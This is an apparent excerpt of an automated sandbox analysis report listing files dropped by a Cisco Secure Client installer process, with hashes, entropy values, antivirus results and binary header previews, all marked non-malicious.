                                                                                                                                                                                                  Size (bytes):286824
                                                                                                                                                                                                  Entropy (8bit):6.617095335993768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                                                                                  MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                                                                                  SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                                                                                  SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                                                                                  SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5I.Rq(..q(..q(..eC..|(..eC...(..eC..g(..#]..~(..#]..e(..#]..&(..eC..p(..eC..|(..q(...(...]..}(...]..p(...]u.p(..q(..p(...]..p(..Richq(..................PE..L...c..d...........!.........~...............................................`............@.........................P...........x.... ..................hH...0..,(..t...p..............................@............... ............................text............................... ..`.rdata..*#.......$..................@..@.data...d'..........................@....rsrc........ ......................@..@.reloc..,(...0...*..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1865320
                                                                                                                                                                                                  Entropy (8bit):6.970258455602142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                                                                                  MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                                                                                  SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                                                                                  SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                                                                                  SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........],.<B..<B..<B..D..<B..IC..<B..IG..<B..IF..<B..IA..<B..WC..<B..<C.'<B..<B..<B..IF..>B..IB..<B..I...<B..I@..<B.Rich.<B.........................PE..L.....Od...........!......................................................................@A........................@^......XH..T.......................hH......|....Y..T...........................`Y..@............................................text...8........................... ..`.rdata..bf.......h..................@..@.data....N...`.......H..............@....rsrc................^..............@..@.reloc..|............d..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):449128
                                                                                                                                                                                                  Entropy (8bit):6.524987350757864
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:H42omt0CD5eYwFZ6depVyQ7YAf1ZMGnz8J4N4OTW8kd6ghNu99hO5nxjOE6ARsMp:LqN4//sHTTHx4KtsutnLlEa2
                                                                                                                                                                                                  MD5:5608F2FEEEC9519ABC4C45AD6156F224
                                                                                                                                                                                                  SHA1:55B1E59342A3F0011714E146A0FFDB52CDE267DD
                                                                                                                                                                                                  SHA-256:3DEC5D47533E9DCCAF3F851DE4D37E289407CB9064CD1F32ADD08D2ABFAB75D4
                                                                                                                                                                                                  SHA-512:FF605F0F7EC45BE82696D1FAB43D74C59991AFC692C61674CA7317DF1C9953EE25D65AC94910D856EB98E6D48C280D8298C54C09BA2346B9A1959E9071ECF717
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..~..~..~..]~...~......~......~......~......~......~......~..~...~......~......~..1~..~......~Rich..~........................PE..L.....Od...........!................p.....................................................@A.............................;..l........p..................hH.......;......T...............................@...............X............................text.............................. ..`.rdata.............................@..@.data...l....P.......6..............@....rsrc........p.......P..............@..@.reloc...;.......<...V..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347752
                                                                                                                                                                                                  Entropy (8bit):6.708372875308561
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:xS6/w5Vk2RM0ZdTNd5JYjV7JYwXhik4QNEN519X+Iw99Itmf:xS5Vk2RtZw5JYwXhpzyNttg
                                                                                                                                                                                                  MD5:84EB38D113F69752F45B9A1852536093
                                                                                                                                                                                                  SHA1:D24161590E4C7541D183A0871694DEFE92F81783
                                                                                                                                                                                                  SHA-256:276C98884E9945BC79AB4D84069CFE543752FBD064E88EE78DE0256F8B1DF374
                                                                                                                                                                                                  SHA-512:0B69B29809915DFC348AD36E528BE4DE5E251F30AA7E3FA1017F1F3A24FF315C4F5290423D15C62AA3E4F3AFA573362675177EC05E48B78FA2995C2D5F5BD310
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L/D.-A..-A..-A..U...-A..E@..-A.+....-A..ED..-A..EE..-A..EB..-A..K@..-A..D@..-A..-@..,A..DE.(-A..DA..-A..D...-A..DC..-A.Rich.-A.................PE..L...-m.b...........!.........*...............................................@............@................................T...@.......................hH.......3..P...T...............................@...............d............................text...U........................... ..`.rdata..D...........................@..@.data...\...........................@....rsrc...............................@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):491624
                                                                                                                                                                                                  Entropy (8bit):6.495709095629098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:8UBgEIe9ncUGQljr+1x87dfK8k9rqXsPNcJESSFCejFp:rFyUIP8Hk9rpcJEmev
                                                                                                                                                                                                  MD5:CE72AE5437229CC4EAB1FCE6C2B10555
                                                                                                                                                                                                  SHA1:46177D24E1CC592FB31F3B9A88F7A4CCF5B4D742
                                                                                                                                                                                                  SHA-256:24C42AD6CC70A169AFE6232E87E94BB4DC7ADC64A1C58A2A7565D28171E1AED0
                                                                                                                                                                                                  SHA-512:282751765E46AC037E13E4FA0DFC34ECF8D5FD08B7358775E55F44D91B4267A38B3345095C180DDDCCBADFD6645D05744F1E3109BAF84678125A51D6DE6A1955
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*U.K;..K;..K;..3...K;..>?..K;..>8..K;..>:..K;..>>..K;.n>:..K;.. :..K;..>:..K;..K:..J;.n>2..K;.n>..K;..K...K;.n>9..K;.Rich.K;.........................PE..L...B..d............................`.............@.................................n9....@.................................H...T....................8..hH... ...W..x...T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data....5.......&..................@....rsrc...............................@..@.reloc...W... ...X..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):486504
                                                                                                                                                                                                  Entropy (8bit):6.862184684725985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:cxog6V56WiNYPTL0x+/OB7hiCM/JFJQtqx:cxo/V56WiyPhe7kCM/fJQt0
                                                                                                                                                                                                  MD5:B5206EC55DD02AA88783189589F72953
                                                                                                                                                                                                  SHA1:F8180A92BEFAF78EED660435425B1B0B97BFA730
                                                                                                                                                                                                  SHA-256:F6F22F6C9A31CB561E69D5D5892EAA4A44A51FCF36AB27841A00AA07E33ABD68
                                                                                                                                                                                                  SHA-512:4A117F579A3BABBB7C6CF8072671E1363BEB63869030A2D0B376BBEFA448F88CC2CAED6F17026A5AB34A8E3E9B3EEF80DD8BD2441FAAF70D13F917DDA9FB8BAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......&.b...b...b...k.E.t.....+.f...0...h...0...d...0...{...0...f......d...v...j.......|...7...a...b.........n......c....).c...b.A.c......c...Richb...........................PE..L......d...........!.........N......P........................................`.......,....@A.........................}..x............................$..hH.......R..PL..T....................M.......L..@...............l............................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...R.......T..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):912488
                                                                                                                                                                                                  Entropy (8bit):6.783823890055007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:hzaSwCkln20SXQK4RjiqKSehi15NeM1+uFTXqNK+FrZeqQFXpB:h+SwCkl20VLipi15NeM1+oTorjoB
                                                                                                                                                                                                  MD5:2DAB87822AC2A484AC9D28D9BEEA60DC
                                                                                                                                                                                                  SHA1:F49F17CD267325EDC70651940E3322E602ECBF63
                                                                                                                                                                                                  SHA-256:88549D168B1062176C09C20A6A264432792A9C3DD291EBB34DDAA16E0C822CCA
                                                                                                                                                                                                  SHA-512:AB8F79AD1AF50D1537E288D5A1E36D65A2463C5F77113E02770DE85BA7058C6054EDC82165D14A061D151CA40D5128C88B9D314635E540D3439B2D8B407ABD42
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........]U...U...U...\...A......_...3.m.Q......._.......^.......J.......Q......J.......Q...A..D...U...[.......w.......T.....o.T...U...T.......T...RichU...........PE..L......d...........!.....V...T...............p............................................@A........................P....y..`z....... ..P...............hH...0.......O..p....................Q......0P..@............p...............................text...zU.......V.................. ..`.rdata..@G...p...H...Z..............@..@.data...._.......V..................@....rsrc...P.... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11144
                                                                                                                                                                                                  Entropy (8bit):7.2926694421063205
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:RCFWAyKfdF3Ee2yKO3FWQFBacRSp0X01k9z3AJEx0ALqf:kTb3FR+cR00R9zoE6A+f
                                                                                                                                                                                                  MD5:606BE87B926A7967C1B822260307544F
                                                                                                                                                                                                  SHA1:256B68497E3C942D5545A73FEF4AB4575D4A6BEE
                                                                                                                                                                                                  SHA-256:8B8A4129AD0745ABE9C05BBC36C3C4F97B85C97ECADFC884B6FFBDB5CCEA7B33
                                                                                                                                                                                                  SHA-512:4FBD62B00CD6D5948ACB32FA2250A44C6B6370CAA4CCD9FD5BDCC0FB7B9FA746BF8F1F03C6A7870F815037CAC47D737EAF1A7A77A48D74358D054321BB3B5690
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:0.+...*.H........+u0.+q...1.0...`.H.e......0..#..+.....7......0...0...+.....7........i;..A...ag....230706005513Z0...+.....7.....0..X0....1^...H...........1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0.... ..z.G_#.(....E;...[I...Qh...N1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..z.G_#.(....E;...[I...Qh...N0......p.k,...a.B.>.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0.... .B{[.$>.@.H...tu>.\...`.. ....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .B{[.$>.@.H...tu>.\...`.. .......q0..m0J.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                  Entropy (8bit):5.184476593945747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                                                                                  MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                                                                                  SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                                                                                  SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                                                                                  SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):305568
                                                                                                                                                                                                  Entropy (8bit):6.508762969375985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:RU6viRkqf6rRsLewEo2eCf4nkra75QtUNxNad3fv27/iTf7G/:RU6viRkqf6rRsLew/23Qkro7x4Vfvwd/
                                                                                                                                                                                                  MD5:7119F4B20ECBF6BBB4478A983D34AC70
                                                                                                                                                                                                  SHA1:60C6E6B2EF96C540318FBEDEDF81F5D8BD90148E
                                                                                                                                                                                                  SHA-256:372D4C634E9C8F1DA8EE0ED5DD54E4D2956564FF7FCF62CDEF20689D2EC47F92
                                                                                                                                                                                                  SHA-512:5895F370D1641611BB110D75AADA34DC34359DA83143FE067BB8DD99CCBAB64B832BA7B958C3F09D81B78E3ABBD4601A495BD51070C053D298E7A48745CEC0BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...&.~.,...&.e.-...;.............;..(...;...+...;..(...;...$.../..........5...................Rich/...................PE..d....a.d.........."............................@.............................0...........`A................................................d....................$.......%... ..\.......T............................................................................text............................... ..h.rdata..`<.......>..................@..H.data....d... ......................@....pdata...$.......&..................@..HPAGE.................<.............. ..`INIT.................Z.............. ..b.rsrc................n..............@..B.reloc..\.... ......................@..B........................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):92776
                                                                                                                                                                                                  Entropy (8bit):6.652577402747044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:JXrBoBxhQlrylel5aThWE7amOMjhO5qg9WyVPDNxsU2xS:JXri65Dl67apMjw5qg9WyB1
                                                                                                                                                                                                  MD5:448338FE18DD5BF4F6C6B87203E5ADBA
                                                                                                                                                                                                  SHA1:3095A3A7866188806898F5A366E05C53C9AF9788
                                                                                                                                                                                                  SHA-256:557F2E566FCA90B4BF853F30130EDB15EE675B76B94377ECF81792EEAA3A2690
                                                                                                                                                                                                  SHA-512:13FBEA608AEDEC472419901B6B265608070E5ADBAACFBA71091680B86A4FE0F22564AB01C6DEB283CC501BBE96F12F9196798DF263FC60C828078C66B4D18FA3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............U...U...U...U..UQ.T..U..T..U..T..U..T..U..T..U..T..U..T..U...UM..U..T..U..T...U..zU...U...U...U..T...URich...U........PE..L...O..d...........!.........~.......j.......................................`............@A.........................................0..............."..hH...@..(...P...T...............................@............................................text.............................. ..`.rdata..dS.......T..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..(....@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):624232
                                                                                                                                                                                                  Entropy (8bit):6.548375643467659
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:XaEbYc+L1pQ1aE6Qo+gbEXefqR5nB3naFKMwKKbtxbZ6+XZdtbjmb2gOb/vBUbyk:XaEbYc+LUtB3ZssEiqYfQQEvFBEfI+Q
                                                                                                                                                                                                  MD5:1536EB035B356121711182E1A3413658
                                                                                                                                                                                                  SHA1:D188D4ABF1FFA6C7E577D9AD3FDCF1ED57C6BD85
                                                                                                                                                                                                  SHA-256:DD600CEDE829CFBE9E1B5B2F1B35219294654C19DC4E9E208CFCF6DF71F2B957
                                                                                                                                                                                                  SHA-512:049CA3075D2BE2E0DD3FFD59C5C7EE0A417D3565ED53E9E589CFF7E68AE8E34C91824A97EC6C1C6E0139D4DF485906632E066CC21805FBB299E3FBB1E11A568E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]..Q..~...~...~.......~.......~.K.z...~.K.}...~.K.....~......~...z...~.K.{.6.~.......~...~...~.....G.~..w...~......~.......~..|...~.Rich..~.........................PE..L......d.................0..........`$.......@....@..........................p......@b....@.................................`2..........pS...........>..hH.......Q......T..............................@............@..l............................text..../.......0.................. ..`.rdata..P....@.......4..............@..@.data....K...`...F...R..............@....rsrc...pS.......T..................@..@.reloc...Q.......R..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):45672
                                                                                                                                                                                                  Entropy (8bit):6.909278775883234
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kD0B4emSfS7QU1+oZYDGV5ENAMxfwDGV/vUAMxkEr:ce8+oixfRKx/
                                                                                                                                                                                                  MD5:F9E23973D3BF6B1A6ECAD723B07FDDD1
                                                                                                                                                                                                  SHA1:958C2BBF7D86C8B4527DA5082A4BA3428465031D
                                                                                                                                                                                                  SHA-256:9990F20DAA97C9502D6E056EE81E2B8815AF9DAF52A2E22B95A3CCB00C6BA332
                                                                                                                                                                                                  SHA-512:48A36927B69443DE27EEE9FFF3D84E06DB6BB050B62A4CE2AC3014362B7BA119648294578545FA48BC95D497FAE1D99D010AA5A1AD78E9C8F15D09F427CE66E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...o...n.....~.d...4.z.v...4.{.l...4.|.c...4.~.b.....~.e...f.~.U.....z.e.......g.....}.g...Richf...................PE..L.....^...........!.....4...2.......3.......P............................................@.........................._.......o.......................j..hH..........PS..............................pS..@............P...............................text...K2.......4.................. ..`.rdata...%...P...&...8..............@..@.data...|............^..............@....rsrc................b..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61032
                                                                                                                                                                                                  Entropy (8bit):6.808659945563971
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:8G+TDeIz+avSPNWxdk8uSDmzItwhHXWT2nLHSJDGV5ENAMxaqydDGVDyAMxkEku:8veOAidk8uSRGWCelxaq/QxV
                                                                                                                                                                                                  MD5:4181824994B367CABC348F8E308DD792
                                                                                                                                                                                                  SHA1:3C4508092416D6BB68F2BED15BCBA578294FDFE3
                                                                                                                                                                                                  SHA-256:AC91D41BDC0EA04E56D2EED724EB487B59E920F59B1E24440F5A3AED11B4E8C4
                                                                                                                                                                                                  SHA-512:C802E372F6886F968BEE9DC6AD512F0DAA666C0632AF5EAEA63605733749D718879202BA8C9225BDD083D24B079B110ED37A2B1E9AD868AEF149B122703D2177
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................}..................................~.....~.....~.....Rich...........................PE..L.....^...........!.....R...P......@R.......p............................................@.....................................x.......................hH...........z......................P{.......z..@............p...............................text...kP.......R.................. ..`.rdata...;...p...<...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):126568
                                                                                                                                                                                                  Entropy (8bit):6.722288477011462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:gGGKu/VLwQR1ky0vAF2/Fk5kIEFor6SVTdUT75VU:gGGKu/VLwYIAA++9ohVpUf5VU
                                                                                                                                                                                                  MD5:23F1917EF17DB9B94F4E4FFBE56320FB
                                                                                                                                                                                                  SHA1:964967CCBB8AEE664E8294B39E72A608C17B41A0
                                                                                                                                                                                                  SHA-256:0E48269187B4D99FC892B373EA247A48E852F71792F5F28E30001C509B8A3971
                                                                                                                                                                                                  SHA-512:ACCAC7B61E6D18662E1FF702D41052F519EE029FE4820185168B5CDF7049526DD28B43F0A84C1FFB8E2C0E1AE933D351EF9CB6AE9D410F1C312FA5DB01127120
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z............../..........................................................................Rich............PE..L.....^...........!......................... ...........................................@..........................T...D..,...........................hH...........+.......................+......0+..@............ ...............................text............................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37992
                                                                                                                                                                                                  Entropy (8bit):6.96957396675789
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kkB1x1cnnFDRhUtUMquc51DGV5ENAMxD26DGVkDAMxkEjb:x1LcnFFWRvcnxD3jxvb
                                                                                                                                                                                                  MD5:D10B79B1F82E60C76CB92B91DB45D3AB
                                                                                                                                                                                                  SHA1:19739B47088E76EDB8724D19A66BF4416C96CCED
                                                                                                                                                                                                  SHA-256:F9F4B8E1C40557F06A5426A83D3423C57E75EE02938392984D478F155F13BDFC
                                                                                                                                                                                                  SHA-512:4A337B08446DA741844436268B971ED83ADA00FE0A184D9C228382565F0B694C185D6BECBF7350EFC2363813F3E0EDC77F7D5C70CBB436CC58C103C8E782F844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..f*..f*..f*......f*...+..f*.../..f*......f*...)..f*...+..f*..f+..f*.../..f*...*..f*...(..f*.Rich.f*.........PE..L.....^...........!.....&...".......,.......@......................................V.....@..........................L..L...LN..x....p...............L..hH......t...0C.......................C......PC..@............@...............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......@..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):97384
                                                                                                                                                                                                  Entropy (8bit):6.671284905085064
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:uqA5yIFN6BM8oAb7KgcvteBM53LZLux2ZXcpXNmzoPd0y+oo49FxyrPxTq:05yIFIM8pbeteBMXNZXI0y+oo4P
                                                                                                                                                                                                  MD5:7E67C939282B7893B1FC6624F7BE497E
